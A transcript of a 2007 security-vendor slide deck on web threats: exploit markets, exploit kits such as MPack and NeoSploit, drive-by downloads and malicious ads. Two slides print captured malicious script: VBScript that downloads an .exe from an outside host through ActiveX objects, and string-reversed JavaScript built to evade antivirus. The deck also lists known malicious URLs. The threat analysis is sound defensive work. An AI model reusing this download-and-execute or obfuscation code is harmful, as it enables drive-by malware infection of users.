Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.
description
Transcript of Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.
![Page 1: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/1.jpg)
Latest Threats and Attacks in Web Security
Iftach Ian Amit
Director, Security Research
Finjan inc.
![Page 2: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/2.jpg)
Finjan Latest Threats – Greek ICT Forum 20072
The Business Behind New Exploits
![Page 3: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/3.jpg)
Finjan Latest Threats – Greek ICT Forum 20073
IE Vulnerability For Sale
![Page 4: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/4.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Buying Vulnerabilities
4
![Page 5: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/5.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Exploits Selling Service
5
![Page 6: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/6.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Exploits Selling Service
6
![Page 7: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/7.jpg)
Finjan Latest Threats – Greek ICT Forum 20077
Web Attacker Toolkit - Website
![Page 8: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/8.jpg)
Finjan Latest Threats – Greek ICT Forum 20078
Web Attacker Toolkit – AV Will Not Detect It
![Page 9: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/9.jpg)
Finjan Latest Threats – Greek ICT Forum 20079
Web Attacker Toolkit – Order Page
![Page 10: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/10.jpg)
Finjan Latest Threats – Greek ICT Forum 200710
Web Attacker Toolkit – Statistics Report
![Page 11: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/11.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Neo Sploit
Updating the ‘customer’ when new versions are available
The recent ‘Release note’ log
Important update! Please update our product to v1.0.6 RC! 24 April 2007- fixed crypt algorithm
16 April 2007- new exploit module added- removed ANI exploit- fixed crypt algorithm
11 April 2007- new exploit module added- fixed crypt algorithm
31 March 2007- new exploit module added
22 March 2007- new exploit module added
11
![Page 12: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/12.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
MPack Toolkit – Statistics Report
12
![Page 13: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/13.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Multi Exploit Pack
13
![Page 14: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/14.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Where are the Malicious Servers?
Geo footprint of a single MPack toolkit operator
14
![Page 15: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/15.jpg)
Finjan Latest Threats – Greek ICT Forum 200715
Drive-by, While Visiting Websites
Innocent Free Games site
![Page 16: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/16.jpg)
Finjan Latest Threats – Greek ICT Forum 200716
Drive-by, While Visiting Websites
Innocent Free Games site
Exploits our desktop to install a Trojan
![Page 17: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/17.jpg)
Finjan Latest Threats – Greek ICT Forum 200717
Drive-by, While Visiting Websites
Dynamic Code Obfuscation
Each user session includes a different exploit content
![Page 18: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/18.jpg)
Finjan Latest Threats – Greek ICT Forum 200718
Drive-by, While Visiting Websites
Free Whois service ….
![Page 19: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/19.jpg)
Finjan Latest Threats – Greek ICT Forum 200719
Drive-by, While Visiting Websites
1. Exploits the Internet Explorer VML vulnerability
2. Downloads a spyware
3. Downloads a malicious JPG file – Trojan.JS.Psyme.ct
4. Checks the type of Anti-Virus installed
5. Injects a virus that the installed Anti-Virus does not detect
![Page 20: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/20.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
AJAX-Based Exploits in the Wild, Hosted in the US
20
http ://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)
![Page 21: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/21.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
AJAX-Based Exploits in the Wild, Hosted in the US
dl = "http://gigafoto.front.ru/pr.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str1= "Ado“+ "db.“+ "Str“+ “eam“
str5=str1
set S = df.createobject(str5,"")
str6="GET"
x.Open str6, dl, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
21
AJAX request goes undetected
The Trojan to be downloaded
Escape from Anti-Virus signatures
Save Trojan on the victim’s disk
![Page 22: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/22.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Distributing Malicious Code Using Ads
22
![Page 23: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/23.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
The Malicious Ad
23
![Page 24: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/24.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
24
![Page 25: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/25.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
25
![Page 26: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/26.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program – in Action
26
![Page 27: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/27.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
27
![Page 28: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/28.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
How it looks like in the field?
28
![Page 29: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/29.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Keeping all this activity under control:Evasive attacks!
29
![Page 30: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/30.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Trojan’s Log
30
![Page 31: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/31.jpg)
Finjan Latest Threats – Greek ICT Forum 200731
Trojan’s Log for Sale
![Page 32: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/32.jpg)
Finjan Latest Threats – Greek ICT Forum 200732
Reactive Security Technologies…
SignaturesSignatures HeuristicsHeuristics URL CATURL CAT
They detect known attacks quickly…
BUT THEY
Do not stop the next attack
Do not stop a targeted attack
Require frequent updates
Require huge signature / URL databases
The next wave of attack
A targeted attack
The next wave of attack
A targeted attack
![Page 33: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/33.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
RSS Feed – Malicious Code, Reversed
http://www.tv-personalonline.com/rss2/rss.php
var fname = "C:\\mssync20.exe";var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");RE(";)'r_','di'(etubirttAtes.r_"); RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok= 0;try{
var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");is_ok= 1;
}catch(e){}
if (is_ok!= 1){
try{
var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");is_ok= 1;
}catch(e){}
}
33
![Page 34: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/34.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
function RE(s) { return eval(RV(s)); }
function RV(s){
var rev = "";for (i = 0; i < s.length; i++){
rev = s.charAt(i) + rev; }return rev;
}
RSS Feed – Malicious Code Reversed
Reversed functions
34
![Page 35: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/35.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
RSS Feed – Malicious Code Reversed
Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)
35
![Page 36: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/36.jpg)
Finjan Latest Threats – Greek ICT Forum 2007
Recent Example
![Page 37: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/37.jpg)
Finjan Latest Threats – Greek ICT Forum 200737
Finjan‘s Technology Real-Time Content Inspection (Patented)
Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)
![Page 38: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/38.jpg)
Finjan Latest Threats – Greek ICT Forum 200738
Audit Results at Customer Networks
![Page 39: Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.](https://reader036.fdocuments.in/reader036/viewer/2022062802/56814473550346895db10612/html5/thumbnails/39.jpg)
Thank you